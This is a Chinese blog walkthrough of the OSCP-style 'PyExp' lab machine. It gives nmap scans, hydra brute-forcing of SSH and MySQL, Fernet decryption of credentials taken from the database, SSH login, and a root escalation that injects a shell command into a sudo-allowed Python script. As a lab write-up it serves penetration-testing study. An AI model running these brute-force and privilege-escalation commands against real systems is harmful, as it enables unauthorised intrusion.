OSCP系列靶场-Esay-PyExp保姆级

最新推荐文章于 2024-07-22 17:51:45 发布
最新推荐文章于 2024-07-22 17:51:45 发布
阅读量1.8k 收藏
点赞数
分类专栏: OSCP 文章标签: 安全 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/132401808
版权

OSCP靶场系列-Esay-PyExp

目录

总结

getwebshell : Mysql端点发现 → 暴力破解root密码 → 利用20w大字典爆破成功→ 进入数据库发现加密信息 → fernet解密得到账号密码 → ssh登录

提 权 思 路 : sudo特权文件发现 → python提权

准备工作

  • 启动VPN
    获取攻击机IP → 192.168.45.194

  • 启动靶机
    获取目标机器IP → 192.168.203.118

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次(多次扫描减少误扫)
sudo nmap --min-rate 10000 -p- 192.168.203.118

PORT     STATE SERVICE
1337/tcp open  waste
3306/tcp open  mysql


开放的端口-→1337,3306

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p1337,3306 192.168.203.118

PORT     STATE SERVICE VERSION      
1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2     
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1

信息收集-端口测试

1337-SSH端口的信息收集

1337-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
探测版本为OpenSSH 7.9p1 Debian 10+deb10u2 

# 搜索对应脚本
msf6 → searchsploit OpenSSH 7.9p1

1337-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试

sudo ssh root @192.168.203.118 -v -p 1337

显示publickeypassword就是支持密钥以及密码登录

1337-SSH手动登录尝试(无)

因为支持密码登录,尝试root账户的密码弱密码尝试

sudo ssh root @192.168.203.118 -p 1337
# 密码尝试
password → root


弱密码尝试失败

1337-SSH弱口令爆破(静静等待)

因为支持密码登录,尝试root账户的密码爆破,利用工具hydra,线程-t为6

sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.203.118 ssh -s 1337

挂着工具进行爆破,我们尝试后续信息收集

3306-Mysql端口的信息收集

3306-Mysql端口的默认脆弱口令测试
# 尝试直接使用mysql协议进行root:root尝试(远程需-h)
mysql -h [目标IP] -u [用户名] -p [密码]
mysql -h 192.168.203.118 -uroot -proot

3306-Mysql端口的默认账号爆破测试
# 尝试hydra爆破mysql中root账户密码
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -vV 192.168.203.118  mysql

尝试爆破发现没有密码,陷入了僵局,决定上大字典

3306-Mysql端口的默认账号爆破测试
# 尝试hydra爆破mysql中root账户密码
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 64 -vV 192.168.203.118  mysql

大字典爆破了很久很久才发现了密码prettywoman

3306-Mysql端口登录

mysql -h 192.168.203.118 -uroot -pprettywoman

3306-Mysql端口的用户信息查找

主要查找登录的账号密码等信息

# 展示数据库
show databases;
# 使用需要查找的数据库
use data;
# 展示表
show tables;


# 寻找我们需要的表,通常名为user、admin
select * from fernet;

发现了加密的credkeyy

cred
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
keyy
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

通过百度发现表名已经给了提示,加密类型就是fernet
https://cryptography.io/en/latest/fernet/讲解了是如何加密的

# 加载
from cryptography.fernet import Fernet
# 这里输入key
key = Fernet.generate_key()
f = Fernet(key)
# 这里输入密钥
token = f.encrypt(b"my deep dark secret")
# 得到结果
f.decrypt(token)
b'my deep dark secret'

python3

from cryptography.fernet import Fernet
# 这里输入key(报错进行修改)
# key = Fernet.generate_key('UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=')
# 代码里是要生成一个key,这里是我们指定key
key = b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
f = Fernet(key)
# 这里输入密钥(不对 不用加密)
# token = f.encrypt(b"gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=")
# 直接指定token进行解密
token = b"gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys="
# 得到结果
f.decrypt(token)
# b'my deep dark secret'
b'lucy:wJ9`"Lemdv9[FEw-'

得到了账号和密码的信息

lucy:wJ9`"Lemdv9[FEw-

漏洞利用-getwebshell

获取账号密码之后利用SSH进行登录

sudo ssh lucy @192.168.203.118 -p1337
password → wJ9`"Lemdv9[FEw-

内网遨游-getshell

FLAG1获取

lucy @pyexp:~$ find / -name local.txt 2→/dev/null
/home/lucy/local.txt
lucy @pyexp:~$ cat /home/lucy/local.txt
ebae58ce8fe13bf90c1ac089200656c0

信息收集-内网基础信息收集

提权的本质在于枚举,在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测Linux操作系统的发行版本

较老的Ubuntu以及Linux系统可以overlayfs提权

# 确定发行版本
lucy @pyexp:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

发行版本为Debian,不太能overlayfs提权

检测Linux操作系统的内核版本

较低的内核版本可以进行脏牛提权

lucy @pyexp:~$ uname -a
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux

内核版本为4.19.0

检测当前用户的权限
lucy @pyexp:~$ id
uid=1000(lucy) gid=1000(lucy) groups=1000(lucy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
列举出所有的sudo文件

查找具有sudo权限,且不需要密码的可提权文件
如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

# 利用sudo -l寻找
lucy @pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py

权限提升

sudo权限提升之python

查看了一下可以sudo的文件,可以读

lucy @pyexp:~$ cat /opt/exp.py
uinput = raw_input('how are you?')
exec(uinput)

会执行uinput的内容,执行之后可以在后面输入内容,因为是input

如果发现有东西的话 访问 https://gtfobins.github.io 寻找

# 尝试在后面加上import os; os.system("/bin/sh")
lucy @pyexp:/opt$ sudo /usr/bin/python2 /opt/exp.py
how are you?import os; os.system("/bin/sh")
# id
uid=0(root) gid=0(root) groups=0(root)

提权成功

FLAG2获取

# cat /root/proof.txt
419157ef0f5cab7409e0818499f4bda6

完结撒花~

后记

没想到的点:
数据库中可以通过load_file读取文件,用select load_file('/etc/passwd')

利用hyrda爆破大字典总觉得力不从心,查阅资源发现可以使用medusa进行爆破

杳若听闻
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OSCP - vulnhub BILLY MADISON: 1.1 靶机测试
m0_55751267的博客
08-12 1068
BILLY MADISON: 1.1 靶机测试
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1064
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
【OSCP系列】OSCP靶机-Sumo(原创)
最新发布
Lusen的博客
07-22 712
OSCP系列-Sumo靶场做题记录
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 458
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
OSCP 2021攻略之旅--从小白到通过
热门推荐
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
OSCP靶场系列-Esay-BBSCute保姆
杳若的博客
07-23 5798
BBSCute保姆靶场流程
【OSCP系列靶场-Esay-Potato】
Technology_77的博客
09-14 260
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。根据收集的数据和经验,改进蜜罐配置和网络安全防御。从初代到现在,黑客发展逐渐有了对于名号的划分,从1999年起的“中美黑客大战”,Honker这一词逐渐进入人们的眼球。总的来说,Easy Potato是一个强大的蜜罐系统,可以帮助提升蜜罐的有效性和网络安全防御。这些都值得耐人寻味,不过,黑客这一词在莎士比亚的那个年代就存在了,最早的计算机诞生于1946年宾夕法尼亚大学,而最早的黑客却出现在。
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
OSCP-Cheat-Sheet:更加努力
03-05
【标题】"OSCP-Cheat-Sheet:更加努力"揭示了这个压缩包文件的主要内容,它是一个关于OSCP(Offensive Security Certified Professional)认证的学习备忘单,旨在帮助备考者更有效地准备考试。OSCP网络安全领域的一...
OSCP-Exam-Report-Template-Markdown
04-02
我在Markdown中创建了攻击性安全考试报告模板,因此在进行攻击性安全OSCP,OSWE,OSCE,OSEE,OSWP,OSEP,OSED考试时,不再需要LaTeX,Microsoft Office Word,LibreOffice Writer! 现在,您可以在检查报告编辑...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机。靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
靶场实战(7):OSCP备考之VulnHub Potato 1
OneMoreThink
01-04 1104
靶机官网:Potato: 1[1]实战思路:主机发现端口发现(服务、组件、版本)漏洞发现(获取权限)2112端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞1(目录、文件)URL漏洞2(目录、文件)22端口/SSH服务组件漏洞口令漏洞提升权限01、suid02、cron03、sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发现(服务、组件、版本)使用命令s...
OSCP系列靶场-Esay-SunsetDecoy
2301_80115097的博客
04-03 1408
发现zip文件 →zip存在密码 →john爆破zip密码 → 发现passwd与shadow文件 → 爆破shadow密码 →ssh登录提 权 思 路: 发现后台运行程序 → 上传pspy64查看 → 发现chkrootkit→chkrootkit提权当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场
m0_62652276的博客
12-02 1251
OSCP推荐靶场:VulnHub DevGuru: 1 个人打靶笔记
OSCP靶场1-SolidState(smtp、pop3、james)
墨痕诉清风的博客
04-22 349
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
靶场实战(15):OSCP备考之VulnHub STAPLER
OneMoreThink
01-13 1002
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞139端口/SMB服务组件漏洞口令漏洞666端口/doom服务组件漏洞其它漏洞80端口/HTTP服务组件漏洞URL漏洞12380端口/HTTP服务组件漏洞URL漏洞12380端口/HTTPS服务组件漏洞URL漏洞提升权限www-data用户sudosuid cron内核提权信息收集JKanode用户sud...
OSCP系列靶场-Esay-Ha-natraj
hackzkaq的博客
01-02 906
getwebshell → 目录扫描发现端点 → 发现文件读取 → 验证确认是文件包含 → 包含了ssh登录日志 → 反弹shell包含提 权 思 路 → 发现sudo别的apache2服务 →apache2服务启动时修改其用户权限 → 重启apache2从目录权限提升到用户权限 →sudo-nmap权限提升。
OSCP 靶场 - Vault
qq_69775412的博客
01-18 441
原理: 通过工具枚举出当前用户在域控中的权限, 发现对域控有完全控制权限,然后将当前账号修改为本地管理员提权。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值